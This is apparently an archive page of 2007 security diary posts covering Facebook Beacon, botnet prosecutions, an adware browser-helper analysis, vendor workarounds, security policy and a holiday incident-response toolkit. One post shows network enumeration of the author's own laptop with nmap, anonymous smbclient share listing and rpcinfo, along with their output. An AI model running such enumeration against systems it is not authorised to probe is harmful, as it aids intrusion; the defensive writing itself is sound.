No small amount of controversy has been raised about Facebook apparently tracking and making public the purchases users are making through online while logged into the Facebook site (even if they aren't doing it explicitly through facebook). Without going into much repetition of what has been said elsewhere about the controversy (or repeating what I've said in another article I've written on the subject) or the specifics of tracking users in general, the interesting part of the controversy is that it was entirely preventable. When users add applications in Facebook, it asks them if they want messages put in their profile and so forth and allows users to block feeds from being entered by other third-party sites, and there are additional privacy settings that would hide the feed regardless. Instead of being responsible, users mindlessly clicked forth not bothering to think of the implications of what they were doing, put information out there that some didn't want out there, and now complain that someone didn't protect them from doing silly things. What you say and do online can and will be used against you (ok, maybe I'm just a tad cynical there), and when push comes to shove, the only person that can protect their personal data is the person themselves. And it's not just Facebook you have to worry about.
There are malicious porn sites out there being tracked by McAfee that use pop-ups to extort money from perusers of free porn and many also sell the personal information of their clientele. I recall an incident investigation I did some years ago that pointed back to a porn site in Mexico that happily charged people for their wares, and then turned around and sold the credit card information legitimately given to them. And it's not just unsavory websites that happily take user information quietly and use it for commercial purposes, big companies do it too (i.e. Google).
The moral of the story is consumers need to be wary of how, when and to whom they give their personal information online. For the more privacy conscious, check out Firefox extensions TrackMeNot and AdBlock Plus to trim down on the information you put online.
UPDATE 2011 UTC: Facebook has made some modifications to the tracking service (Beacon) so that users have even more of an opportunity to restrict that information.
John Bambenek / bambenek (at) gmail [dot] com
University of Illinois
The FBI announced today that since Operation "Bot Roast" was made public last June, eight individuals have been indicted, pled guilty, or been sentenced for crimes related to botnet activity. Additionally, 13 search warrants were served in the U.S. and by overseas law enforcement partners in connection with this operation. This ongoing investigative effort has thus far uncovered more than $20 million in economic loss and more than one million victim computers. Round two of this effort, called "Bot Roast II" has resulted in:
- Three new indictments, including two this past month. In one case, the FBI uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
- Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
- The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.
Well done, FBI, and keep at it!
Marcus H. Sachs
Director, SANS Internet Storm Center
Recently I spent some time analyzing a relatively simple BHO (Browser Helper Object) just to see what the bad guys were really doing with it.
The BHO was dropped by an executable, which was part of a bigger adware package pretending to be an anti-virus program (of course). The only dropped file by this dropper was actually the DLL used by the BHO which the dropper registered with the system.
After quick analysis I found out that the BHO captured queries for various search engines and other commonly visited web sites and submitted them to a third web site. That web site had a possibility of displaying various ads on the infected machine (when I tested the BHO that component did not work).
The list of sites that the BHO stole information from was impressive – there were almost 140 sites monitored. For every site, the BHO had information about exactly what to extract, so only the user’s query was sent and not the whole URL.
For example, for wikipedia.org, the BHO extracted the search= parameter, while for search.yahoo.com it extracted the p= parameter.
The extracted parameters where then submitted to a third site (which is not working any more) with the following request:
Two most interesting things in this request are the svPOPUP and svKEYWORDS arguments. The svPOPUP tells the ad site to display targeted ads, related to the keywords submitted in the svKEYWORDS argument. As you can probably guess, those are the search terms that the user entered.
This was all more or less standard, only the number of monitored web sites seemed pretty high – this BHO certainly had a serious impact on a user’s privacy.
After I searched the web a bit, I found out that Elia Florio from Symantec already described another variant of this same BHO which they called Trojan.Advatrix (Symantec's description is here). Besides the information I already had, that particular variant did something else to the machine. Something very, very mean.
Elia found out that the BHO modifies Internet Explorer so that it becomes vulnerable to two security vulnerabilities: MS06-014 known as the MDAC vulnerability and MS07-017, known as the ANI vulnerability.
These two vulnerabilities are probably the most exploited vulnerabilities in Internet Explorer today. The MS06-014 vulnerability is practically a part of every exploit pack today (and is certainly in MPACK, which is the most popular one). Exploits for the ANI vulnerability can also still be found almost everywhere.
What makes me extremely worried is how hidden this whole thing is. The BHO just modifies Internet Explorer’s image which means that no files are written to the disk. In other words, such a machine will look completely patched to Windows Update or any other patch checking system. However, while the BHO is active, the machine will be vulnerable to two most exploited client side vulnerabilities in last couple of years.
The last line of defense, the anti-virus program, is not particularly helpful here either. The dropper I had was detected by only 13 out of 32 AV programs on VirusTotal and the DLL detection was even worse with only 7 AV programs detecting it.
While there are many lessons to learn from this malware, I would like to stress out one really important thing: when a machine gets infected, your only option is to reinstall it from scratch. With today’s malware phoning home and installing stealth, updated modules, this is really a no brainer.
Computerworld is reporting a "large scale, coordinated campaign to steer users toward malware-spewing Websites from Google search results is under way."
- They are quoting approximately 40,000 pages may be hosting malware.
- 27 different domains are involved.
- Each with up to 1499 malicious pages.
- Tactics Used per Sunbelt:
- "comment spam" - bots hide in comment sections with links
- "blog spam" -bogus blog posts
- plug links into any web form requesting a link
Please let us know if you are seeing this activity via our contact page.
Thanks, Mari Nichols
As you can imagine, here at the ISC we get thousands (tens of thousands?) of user submitted questions and suggestions. Let me tell you what, we appreciate it. It's what binds the galaxy together. (TM)
But we had a user submitted question today that I found particularly interesting. Jim wrote in asking us:
"I am looking for some good policies and practices to help my help desk avoid falling victim to social engineering. I looked around on SANS and other sites but find little more than asking a few questions to verify identity. We are also considering a callback as a auditing step. What do you think?"
So what DO you think readers?
Core Security has put out a new advisory concerning a buffer overflow in Lotus Notes. Both remotely and locally exploitable.
Core lists the vulnerable software pieces as:
- Lotus Notes version 7.x
- Lotus Notes version 8.x (not confirmed by Core)
- Lotus Notes version 6.5.6 (not confirmed by Core)
- Other software packages using Verity KeyView SDK using vulnerable
versions of l123sr.dll
Although it's prudent to keep in mind that as of now 8.x and 6.5.6 are NOT confirmed by Core (as in their advisory, and the cut and paste above).
Cut and Paste from Core's Advisory:
Lotus Notes customers should follow the instructions of the following
support Technote, which outlines the available options based on specific
versions of Lotus Notes:
Workaround 1: Delete the keyview.ini file in the Notes program directory.
This disables ALL viewers. When a user clicks View (for any file), a
dialog box will display with the message "Unable to locate the viewer
Workaround 2: Delete the problem file l123sr.dll file. When a user tries
to view the specific file type, a dialog box will display with the message
"The viewer display window could not be initialized." All other file types
work without returning the error message.
Workaround 3: Comment out specific lines in keyview.ini for any references
to the problem file (l123sr.dll). To comment a line, you precede it with a
semi-colon (;). When a user tries to view the specific file type, a dialog
box will display with the message "The viewer display window could not be
initialized". For example:
Workaround 4: Filter inbound emails with attachments with potentially
malicious files. Lotus 1-2-3 files are usually associated to MIME
Content-Type headers set to the following strings:
Note however that workaround #4 is a simply stop gap measure that could be
circumvented by relatively unsophisticated attackers.
There's a new update for Firefox out. 126.96.36.199.
There has been a considerable growth in online collaboration tools. Wiki's are an excellent example of these, and the growth of their use has been dramatic.
However, this success can lead to logistical issues when security advisories are released. Today we have had a reader contact us with a plea to help alert users of TikiWiki that there are exploits being actively attacked.
The TikiWiki team have been working hard on fixing a number of reported vulnerabilities with their Wiki. However it is the site administrators that have been slow to update their systems.
Mose from the TikiWiki project has been very helpful in highlighting that they are working on a new administration pane within their application which will alert administrators to new releases being available. Until then, if you are using TikiWiki, please update to the latest release. For details go to : http://info.tikiwiki.org/tiki-index.php
Thank you all for writing in!! We appreciate it, things have been a little crazy around the ISC today, so we haven't been able to throw some stuff up on the diary about the Quicktime bug. (We've had to wake everyone up, they all ate turkey..tryptophan... it's not pretty, anyway...)
As outlined by Secunia, Apple's Quicktime 7.2 and 7.3 has a overwrite condition via incorrect rtsp parsing. Check it out here.
There are several things you can do until this gets patched (just remember to undo them after you patch!).
1) Block the RTSP protocol. Ports are 554/tcp and 6970-6999/udp.
2) Set the Killbit for Quicktime CLSID's:
There are some other recommendations over at the US-CERT site. But like I said, remember to undo them after the patch, or you will be wondering why things aren't working with your Quicktime streams.
Please remember that Quicktime is a component of iTunes...
Last week I got my xmas gift...:) A Eeepc, (see wikipedia on it).
Basically, it is a small laptop (7'' screen), running a linux version, called XandrOS
(debian based), with a quite user-friendly interface, mostly for internet applications.
Well, it is quite good, and I am really liking it, but, of course, I had to try its security :).
Fortunately it allows you to get a console, which allows you to instantly get a root access, by issuing 'sudo bash'.
Well, this is not good, since if anyone can get it, it can change the root password, maybe letting you with the
unique alternative, restoring the system. So changing the config to ask for password is a ‘must do’, imho...:)
But let’s go to interesting stuff.
I was curious to see which ports were open using nmap from a remote host on it.
That was the result:
The SYN Stealth Scan took 0.61s to scan 1239 total ports.
Host 192.168.0.207 appears to be up ... good.
Interesting ports on 192.168.0.207:
Not shown: 1236 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap finished: 1 IP address (1 host up) scanned in 1.525 seconds
Hum...port 111, 139 and 445...139 and 445 are usually associated with Windows Systems, but we are on a Linux.
Also port 111, this is portmap...
So lets dig a little more. Using smbclient to query our remote system:
lab3:~# smbclient -N -L '\\192.168.0.207' (-L to list and -N for no password)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (eeepc-root server (Asus Eee PC))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
EEEPC-ROOT eeepc-root server (Asus Eee PC)
On my opinion this is too much information to be shared...
Here we have the information that the EEEPC is running Samba (that explains the port 139 and 445), the SAMBA version (3.0.24) and some groups and shares info...
On port 111, nmap says portmap, so lets check it with rpcinfo:
rpcinfo -p 192.168.0.207
lab3:~# rpcinfo -p 192.168.0.207
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
On our local system, we can check those with netstat -anp:
lab3:~# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 2339/smbd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1409/portmap
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1398/cupsd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 2339/smbd
udp 0 0 192.168.0.207:137 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 2337/nmbd
udp 0 0 192.168.0.207:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:68 0.0.0.0:* 2157/dhclient3
udp 0 0 0.0.0.0:68 0.0.0.0:* 1613/dhclient3
udp 0 0 0.0.0.0:111 0.0.0.0:* 1409/portmap
udp 0 0 0.0.0.0:631 0.0.0.0:* 1398/cupsd
Again, samba (smbd and nmbd) and portmap (sunrpc). Also, we can see Cups (used by printer).
Now, we could try to create some iptables rules to restrict access, but the iptables modules are not loaded...:(
Another alternative is to shut it down.
Since it is a debian-based linux, this could be easily done with:
but it will only stop them for the current session. If you reboot it, they will be back...
Another option is to edit the file in /etc/hosts.deny and add the line
to restrict access to this service.
Or even disable it, by commenting the deamons from the usr/sbin/services.sh file.
Again, I am not saying that letting these services open will mean that you will be hacked or so, even because I am not aware of any recent vulnerability on them, but we are at least giving too much information...
This is just one example of how our new gadgets can expose ourselves. New smart phones, linux, windows based can also expose you and your data, and as we are using them to store lots of our data, we must be paranoid on their security measures...at least I am...:)
Ah, about my eeepc...it is not McDonalds, but "I am loving it!" :) All my security tools were installed perfectly on it...;)
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
As I was reading Deb's article yesterday about our need for policies, my first thought was yes, of course we need policies! We are able to write all the policies we want, but how do we get them approved? Do we break the policies down into smaller sections for faster approval? Or do we publish one "Acceptable Use Policy" and hope that covers us with our employees? Do we ask for volunteers for a policy committee? Do we forget about setting standards and just get general network usage policies approved?
Policies, procedures and standards are necessary for multiple reasons. One of the key reasons is to set the record straight for the users of our systems and our system administrators setting up the systems. We need to set the limits on what they can and cannot do. Do you even know where you stand? Do you know what is "acceptable risk" for your organization? Would you have the budget to put behind the policy if it were approved?
Remember to utilize your legal department and internal audit department (if you have them) as assistance in getting justification. We all know that being able to provide proper documentation plays a key role during litigation, outside attack or insider related. These people will help you get the ball rolling in the right direction, if you need help.
If and when you get your policy approved, how often should you revisit and revise? Did you set these time tables into the policy or just thank the digital stars that you finally got sign off? We would like to hear your policy battle stories. Please send any lessons learned from your policy process to us here. I'm looking forward to learning some new techniques.
Corporate IT departments spend millions of dollars to secure the perimeters of their networks. Firewalls, gateway filtering, intrusion detection systems and monitoring services are some of the methods used to keep hackers and malicious code exploits out. Yet their data may still be getting compromised and they don't know it. In today's age of mobile technology the data maybe leaking out unintentionally.
In the past the policy was pretty simple: everyone uses VPN and two factor authentication. Today many corporations use Intranet's and Internal Web Pages to store and access data. This makes it handy for the worker who travels and works on the road. However, if the employee isn't thinking about the security of the company data, if the employee hasn't been trained in the methods needed to secure the data, the company can experience a data leak. For instance, if the employee checks their email or accesses these internal websites from a public terminal in an airport, Internet Cafe, Hotel, etc, what data is left behind? Who could be "shoulder surfing" and watching them work? What about programs planted on these machines that can track all of the information entered (including userid and password information)? If you look at programs like WebWatcher and Spector Pro, you see how easy it may be to capture everything from a public terminal. Because of programs such as these, should corporations have policies against use of public terminals to access company information?
What about the information posted in public tech support sites or blog sites? Is too much information being revealed online in insecure locations? Many self help tech support sites are available on the Internet. There is a wealth of information available and a huge community of "experts" available online. This can be a great thing. However, is proprietary or critical company information being posted in these sites? It is interesting to see the amount of information about their company, systems and network people are willing to share in these exchanges without even realizing that they have just given the bad guy the "key to the door".
Do corporations/companies, (large and small) have policies and procedures in place to minimize the amount of information leakage their company experiences? How do we educate and train our employees to think about what they are doing and how it will impact the company?
SANS Institute has a significant number of resources and templates available for you to start the process of identifying and developing Policies and Procedures. www.sans.org/resources/policies/ This is a good starting place and has some really good templates for a number of security related concerns.
We would like to know if you have a particular policy or procedure that you would like to share with us or if you have good online resources you can recommend.
One of our readers, David Bizeul, spent the past three months researching the Russian Business Network (RBN). The RBN is a virtual safe house for Russian criminals responsible for malicious code attacks, phishing attacks, child pornography and other illicit operations (we previously provided an analysis of the RBN that was produced by iDefense.) The 70-page paper is on David's web site, and David said that he may update it in the future. We are mirroring the paper for him just in case his site gets overloaded. David's contact information is in the paper so if you like what you see please let him know.
Marcus H. Sachs
Director, SANS Internet Storm Center
Happy Thanksgiving to all of our USA readers! For most countries, this weekend coming up is the start of the holiday season. For many retailers, tomorrow (Friday November 23rd) is "Black Friday" and recently there's been the introduction of "Cyber Monday" (Monday November 26th) when everybody comes back to work and uses their office computers to go shopping online. However and wherever you shop, and whatever your customs and traditions are, as we enter another holiday season it's time once again to think about computer security for our family and friends.
This is a golden opportunity for information security professionals around the world to spread the word about security and to "give some security" when you exchange presents later this year. Let us know what you plan to give as a security gift to your friends and families. Do you know of any cool ideas that other readers might like? Did somebody give you something last year that really helped you with security? I doubt that grandma would appreciate a copy of Hacking for Grannies Exposed but I'm sure that there is something on the shelf that would be good for her in a security sense. Please use our contact form to let us know your plans to "give some security" this year. We'll post the best ideas here later in the day.
Art wrote us with a good idea: instead of buying security stuff, he is making CD's for friends and family. He'll put free stuff on them, FREE AVG, Spybot Search and Destroy, and links to other downloads in a .txt file such as Windows Defender. He said it's not a gift for them, it’s for him. Less headaches, he said. He also suggested a gift his wife might consider, a Cisco PIX. Nice touch, Art! I hope that Santa is nice to you.
Marcus H. Sachs
Director, SANS Internet Storm Center
A reader wrote in to tell us about a spam he received that read like this:
"I'm a computer engineer at Islamic University of Gaza(IUG), the network of my university hacked in the last few months , now I design a secure model to repair the network security system in IUG but my experience still little, so I hope that I can obtain a diagram or flowchart or map of your university network security system to study it and see how can apply it in IUG system."
I guess that's a good way of getting information about your network innards instead of hacking it "hey, can you just send me your visio diagram!? That'd be great, kthnkx!"
Gotta watch out for that Social Engineering. It's the basis of all those bank, visa, mastercard, etc.. spams. Phishes, and whatever other things are out there now-a-days. Counting on a "uneducated" user to click and fill out some information.
Been thinking lately about some of the restrictive policies that corporations, .mil, .gov, and some others have when it comes to security.
Does it work?
Where are we at?
Are all the extremely restrictive policies in your corporate work environment working?
What can be relaxed? Why?
Example: I recently ran across an example where iTunes was not allowed on the network because it was considered P2P. Is iTunes P2P? Of course not, but here is an example of where reeducation for the "experts" and the loss of "policy for policy's sake" make be helpful.
We'd like to hear your feedback. What does Security 2.0 mean to you? We all have our own opinions, we'd like to hear yours!
“There is nothing on my computer that a hacker would be interested in.”
How often do you hear that statement as a key point in someone’s defense strategy? It is something I’ve often heard in social outings and family gatherings.
I try to use it as an opportunity for security awareness. First rephrase the statement to by: “There is nothing on my computer that a criminal would be interested in.” This takes the conversation away from the contentious “what does the word, hacker, mean” question/debate. If you focus on protecting yourself form criminals, you stand a pretty good chance against hackers/crackers as well (should you feel there is such a distinction or not.)
What makes up an abstract computer system on the Internet?
- Hard Drive
- Internet access/IP address
- User data
So what would a criminal be interested in on this average computer?
CPU: botnets often use their slave machines to send email, proxy web traffic, and launch denial of service attacks. These all use slices of CPU on the machine to do work that they would otherwise not have the resources to do.
Memory: User’s browsing habits, username/password credentials, and other sensitive user data is captured out of memory.
Hard Drive: I have seen bot-nets that perform no other service than act as a giant library to store pirated films and audio.
Internet access/IP address: every new IP that isn’t already on a blocklist is of interest to spammers. Criminals can host malicious websites on a machine to avoid other blocklists. Criminals can proxy their traffic through a machine hide their true location and avoid some companies’ firewalls blocking known-bad IPs.
What about User Data?
Everyone knows that criminals are interested in your banking and paypal credentials. They are also after your eBay passwords so they can sell stolen goods in your name. They are after your facebook, and myspace credentials so they can post links to malicious websites (look at Dancho Danchev's post today for an example.) They’re after your email address. Even by itself a working email address is worth money. Take a person’s address book and you get their social network that can be used to launch targeted email attacks. Your email address is often used as your account name on a number of web services. It’s arguable that you can correlate more about a person based on their email address than their Social Security Number anymore.
So you may think there is nothing of interest on your machine, but there are certainly things of value on your system. Criminals know how to “make it up in volume.”
Holiday/Family Incident Response Why and How
Apologies in advance that this is Windows-centric.
Many of us are going to visiting with friends and family over the next couple of months while celebrating a number of year-end holidays. Often, we are tapped for on-site tech-support duty in exchange for holiday treats.
Yesterday George posted a request for what's in your holiday/family incident response toolkit. Overnight I collected the response in the hopes to present a useful and organized list.
Incident response under these conditions can be way harder than what one encounters at their day-job. The builds are non-standard, there are rarely backups to rely on, the data are irreplaceable (personal financial data, photographs, genealogical project, etc.) The stakes are often higher.
The response methodology is similar to what you'd run into at work:
- Lessons Learned/Prevention
Hopefully that was done last year when you put on AV, firewalls, and anti-spyware. This year, the root-kit detection tools are more widely available so it's a good time to update your jump-kit and your framework
The first step is an interview with the machine user. You should ask things like:
- "Have you patched recently?"
- "Is the machine running slowly?"
- "Getting a lot of pop-ups?"
Follow the interview with an inspection to verify that the AV is present, running, and up-to-date. Ensure that the OS is fully patched. Peek at the hosts file. See if there is reason to suspect that the machine is compromised before you start tearing into it.
Should you determine that the machine has been compromised, it is time to start backing up the important files off of the machine. The only sure approach to cleaning a system is to rebuild it. There were many spyware/virus cleaning tools submitted, but I consider them useful only in the Identification phase to determine if the machine has been compromised. I personally do not recommend them for reliable system cleanup.
If the system was properly secured last time, and no ill has come of it, then congratulations. But your work is not over. This final stage is the most important stage in incident response. Go over what you found in your investigation, point it out, and provide a solution. No Anti-virus? Put one on. No backups? Make one. Firewall not enabled? Enable it. This is the point where you provide additional instructions, set-up an ongoing tech-support option (if you're brave/generous enough,) and suggest alternatives (say, move them from IE7 to Opera or Firefox-- which have their own issues so you have to carefully consider the consequences of that.)
I broke the tools down into the following categories:
- Frameworks - how one deploys the tools to the system
- System Analysis
- Malware Analysis - a subset of System Analysis tools focused to analyzing the malware
- Network Analysis
- Registry Cleanup
- Remote Support
- Browser protection
CD vs. USB
How should you transport your tools to the site? There are a lot of good arguments supporting the use of burned CDs and USB drives.
- You can leave copies behind for them to use
- It's hard to infect them
- Capacity - a trade-off can be made between capacity and expense by switching to DVD
- Flexibility - you can write to them
- Make nice gifts
- Risky, if you don't write protect them
- Costlier than CD/DVD media
Of course one can simply run from the CD or USB on the live system. In some cases this is the best first step, especially if you suspect something like a botnet running on the system. Live incident response can quickly identify that the machine is compromised and provide you with the code that's causing the traffic right away (see below for the System Analysis tools one can use in these cases.)
Others prefer to work from a boot-disk when analyzing a system, particularly when a root-kit is suspected. These came in two varieties, Windows-based and Linux-based.
In the windows-based options, people recommended:
- BartPE (http://www.nu2.nu/pebuilder/)
- Ultimate Boot CD (http://www.ubcd4win.com)
- PortableApps (http://portableapps.com/)
For Linux-based options try:
- BackTrack 2 (http://www.remote-exploit.org/backtrack.html)
- Knoppix (http://www.knoppix.org/) take a look for the Knoppix variant knoppicillin
- Helix (http://www.e-fense.com/helix/)
- Ubuntu 7.10 which supports Read/Write access to NTFS partitions
These tools can be used for an initial assessment of the system. One (or more) of these should be left installed on the system when you leave. There are plenty of great commercial solutions. I'm only listing free solutions today:
- Grisoft's AVG (http://www.grisoft.com)
- ClamWin (http://www.clamwin.com/)
- Avast! (http://www.avast.com/eng/avast_4_home.html)
- Avira Antivir (http://www.free-av.com/)
- Microworld Free AV toolkit (http://www.mwti.net/products/mwav/mwav.asp)
Like anti-virus tools, these play a role in initial assessment of the system, and should be installed on the system when you leave it for added protection.
- Spybot Search and Destroy (http://www.safer-networking.org/en/spybotsd/index.html) the most commonly suggested tool
- Adaware (http://www.download.com/Ad-Aware-2007-Free/3000-8022_4-10045910.html?part=dl-ad-aware&subj=dl&tag=top5)
- Sunbelt's CounterSpy Trial Edition (http://www.sunbelt-software.com/Home-Home-Office/CounterSpy/)
- cwshredder (http://www.intermute.com/spysubtract/cwshredder_download.html) a very focused spyware cleaner
- Spywareblaster (http://www.javacoolsoftware.com/spywareblaster.html)
- Winpatrol (http://www.winpatrol.com/)
- BOClean (http://www.comodo.com/boclean/boclean.html) which I find to be an interesting little tool
- PC Tools Spyware Doctor (http://www.pctools.com/spyware-doctor/)
- Runscanner (http://www.runscanner.net)
We did not have a lot of these tools last year. They may turn up things that aren't showing up in your other scans.
- Sysinternals RootkitRevealer (http://www.microsoft.com/technet/sysinternals/Utilities/RootkitRevealer.mspx)
- F-Secure Blacklight (http://www.f-secure.com/blacklight/)
- GMER (http://www.gmer.net)
- AVG Anti-rootkit (http://www.grisoft.com/doc/download-free-anti-rootkit)
- IceSword (http://www.antirootkit.com/software/IceSword.htm)
- Rootkit Unhooker (http://antirootkit.com/software/RootKit-Unhooker.htm)
- Sophos Anti-rootkit (http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html)
The guys over at RaDaJo (RAul, DAvid and JOrge) Security Blog have an article inspired by George's post featuring Anti-Rootkit tools: http://radajo.blogspot.com/2007/11/anti-rootkit-windows-tools-searching.html.
Burning a copy of irreplaceable photos and other documents to CD/DVD is time well spent, regardless if the system is compromised and needs to be reinstalled or not. They will likely not regret the time put into this important defense measure. Reader Robert suggests that you can avoid a lot of drag and drop effort by using Areca (http://areca.sourceforge.net/.)
There are a tremendous amount of little programs that can give you an eye into what is going on in the system. These are used during the live response stage of your Holiday/Family incident response. Hijackthis was the overwhelming favorite, followed by huge support of the Sysinternals tools.
- Hijackthis (http://www.spywareinfo.com/~merijn/programs.php)
- Sysinternals Process Explorer (http://www.microsoft.com/technet/sysinternals/utilities/processexplorer.mspx)
- Sysinternals Autoruns (http://www.microsoft.com/technet/sysinternals/Utilities/AutoRuns.mspx)
- Sysinternals TCPView (http://www.microsoft.com/technet/sysinternals/Utilities/TcpView.mspx)
- Sysinternals Procmon (http://www.microsoft.com/technet/sysinternals/utilities/processmonitor.mspx)
- Sysinternals Filemon (http://www.microsoft.com/technet/sysinternals/utilities/filemon.mspx)
- Sysinternals Streams (http://www.microsoft.com/technet/sysinternals/FileAndDisk/Streams.mspx)
- DatFind (http://virus-protect.org/datfindbat.html) an interesting little German batch-file that reports on recently changed system files.
- LADS (http://www.heysoft.de/nt/ep-lads.htm)
- OpenPorts (http://www.topshareware.com/DiamondCS-OpenPorts-download-7334.htm)
- WhyReboot (http://exodusdev.com/products/WhyReboot/)
- Microsoft XP Change Analysis Diagnosis Tool (http://support.microsoft.com/?kbid=924732)
- XRayPC (http://www.x-raypc.com) which has some interesting client/server applications for remote tech support
Use of these tools can occupy a lot of your time and require a fair amount of experience. Russ has offered a helpful write up for a Rapid Malware Response/Analysis process (http://holisticinfosec.org/publications/MalcodeAnalysisTechniquesForIH_McRee.pdf.)
These tools were offered up to take a closer look at the malware that has been found on the system. Using these requires a larger investment of time than many people have while visiting. But for future use, these tools might be handy to have on your own incident response toolkit.
- Mandiant Red Curtain (http://www.mandiant.com/mrc)
- OllyDbg (http://www.ollydbg.de) a freeware debugger for tracing program execution
- PEiD (http://peid.tk) for detecting packers, cryptors and compilers
- WinDiff (http://www.grigsoft.com/download-windiff.htm) for comparing files
- XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm) for hex editing
It is sometimes easier to determine if a system is compromised by looking at the network traffic leaving the system. Especially if you're familiar with protocol analysis. Commonly suggested tools were:
- Wireshark (formerly known as Ethereal) (http://www.wireshark.org)
- Nmap (http://insecure.org/) for scanning the suspected system for backdoor listeners
- SmartSniff (http://www.nirsoft.net/utils/smsniff.html) a smaller packet capture program
A few tools were submitted that promise to clean up the registry and other system files to improve system performance.
- CCleaner (http://filehippo.com/download_ccleaner/) commonly recommended by readers
- EasyCleaner (http://personal.inet.fi/business/toniarts/ecleane.htm)
Some brave and generous people offer remote tech support to their families. They have recommended:
It is not something that I would recommend or personally do. For selfish reasons, I don't look forward to late night tech support phone calls from Aunt Minnie. Nor do I like opening up a remote control panel on a machine that I'm trying to protect.
This was the focus of last years post (how to get all of the updates for Grandma's PC together.) The Offline-Update project (http://www.heise.de/ct/projekte/offlineupdate/download_uk.shtml) promises to solve the problem of building your own CD or USB to patch your relatives' machines that have only dial-up connections to the internet. But what about all of those applications on the system? Attacks are moving from OS vulnerabilities to leveraging vulnerabilities in applications like audio players and PDF readers. Secunia offers a program that can inventory and assess the applications installed on the system. Details of this is available at: https://psi.secunia.com/.
Many submissions suggested that they move the user from using IE over to Firefox or Opera. Also, they suggested using McAfee's Siteadvisor (http://www.siteadvisor.com/) and Netcraft's Toolbar (http://toolbar.netcraft.com/.)
Other protection methods
- Ensure that the firewall is enabled and configured properly.
- Enable DEP if it is available
- Tony suggest modifying the hosts file to add further protection (http://www.mvps.org/winhelp2002/hosts.htm)
- Enlist their system to submit logs to Dshield
Kevin Liston (kliston at isc dot sans dot org)
17:07:17.405771 IP 192.168.178.255 > 255.255.255.255: ip-proto-139 30 0x0000: 4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff E..2.......W.... 0x0010: ffff ffff 0100 0200 0000 0000 0000 0000 ................ 0x0020: 0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a ........l@....8* 0x0030: ab63 .c 17:07:17.406835 IP 192.168.178.255 > 255.255.255.255: ip-proto-139 30 0x0000: 4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff E..2.......W.... 0x0010: ffff ffff 0100 0100 0000 0000 0000 0000 ................ 0x0020: 0000 1b3c 90a3 4ac1 50b7 930a b723 a181 ...<..J.P....#.. 0x0030: 431a C.
A bit about the network: 3 PCs, 2 Macs running Leopard. Each Mac runs vmware with Windows XP. All the PCs run Windows XP. There is a "FritzBox" DSL router. Part of the network is wireless. Other then that, there isn't that much special about the network. The hosts run firewalls which are pretty much open locally.
No idea so far why these packets show up. Kind of looks like they are corrupted netbios packets (port 139 > protocol 139?). But why broadcast like this? Please let us know if you have any ideas.
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
One of the main problems the Internet security operations community faces is that although global encompassing incident response and information sharing is happening, it is on the technological and operational levels. We mostly do not know how to communicate with the policy makers. Some of us present there made head-way in the hallways (as the sessions are mostly just repeated talk).
I spoke with Dr Hamadoun Touré, the Secretary General of the ITU on some of our efforts and some of our operational needs, and was pleased to find an open mind and sincere interest. The ITU, at least as far as I understood, is concerned with Internet security, and appreciates the importance of the operational communities and the work we do.
On a surprised note, China ran a few security sessions in which its' delegates have shown high visibility into Internet security and abuse in China, speaking of issues of establishing trust and incident response statistics. They are highly concerned with spam, and are the only ones to have spoken in an operational manner. They quoted numbers from (mainly) US sources that showed spam and abuse activity in China, then they indicated a drop of spam being sent from the Chinese network (spam is of key importance to them in their presentations).
On the other hand they presented an increase in phishing and botnet incidents being reported. In one slide they showed numbers on phishing reports, sorted by top-reporters. The top-5 reporters were: Verisign (probably iDefense), RSA (probably Cyota), eBay (probably eBay), CastleCops (Probably PIRT) and MarkMonitor.
But wait, there's more. The Chinese delegation also discussed mitigation success rates. In phishing, out of over 600 sites reported in one time period they mitigated just over 200. They were sinciere and open on where they have to get better and to be honest, I was in awe from them, a country I considered to be a black hole of abuse reports. We made some new contacts and hope these will prove fruitful for future cooperation. I am highly impressed with the people I met from China..
Another subject of interest to me was my discussion with Milton Mueller on his advocacy of some information being removed from publicly accessible WHOIS data. Although ideologically I am with him on this privacy issue, practically it is the only, granted very poor, way for the Internet security operations community to take down abusive domain names today, through registrars, and the Internet can't do without it until another option is presented. I hope to work with him on solutions to this conundrum.
My lecture there was one I only found out I was giving a about a month ago after being contacted by a member of ICANNs SSAC. It was a part of the Case Studies session from the Diplo foundation ( http://www.diplomacy.edu ), where I spoke, technically, of lessons from the Estonian Internet war and how countries can defend themselves, as written in the post-mortem analysis and recommendations I wrote for the Estonian CERT. In the questions section we spoke of the importance of CERT organizations, how they are established and on the differences in fraud as seen in different parts of the world. My fellow session members were: Robert Guerra (Canada, session moderator), Veronica Cretu (Moldova, facilitator), and the other panelists: Olga Cavalli (Argentina) and Cristine Hoepers (who manages the Brazilian CERT). I, of course, am from Israel and work for Afilias Global Registry Services.
"It is becoming time for the holidays. That means geeks spending time with families. That means geeks need to pack tools for malware cleanup. Do you guys have a CD list of tools and or procedures? This might be worth making a post about."
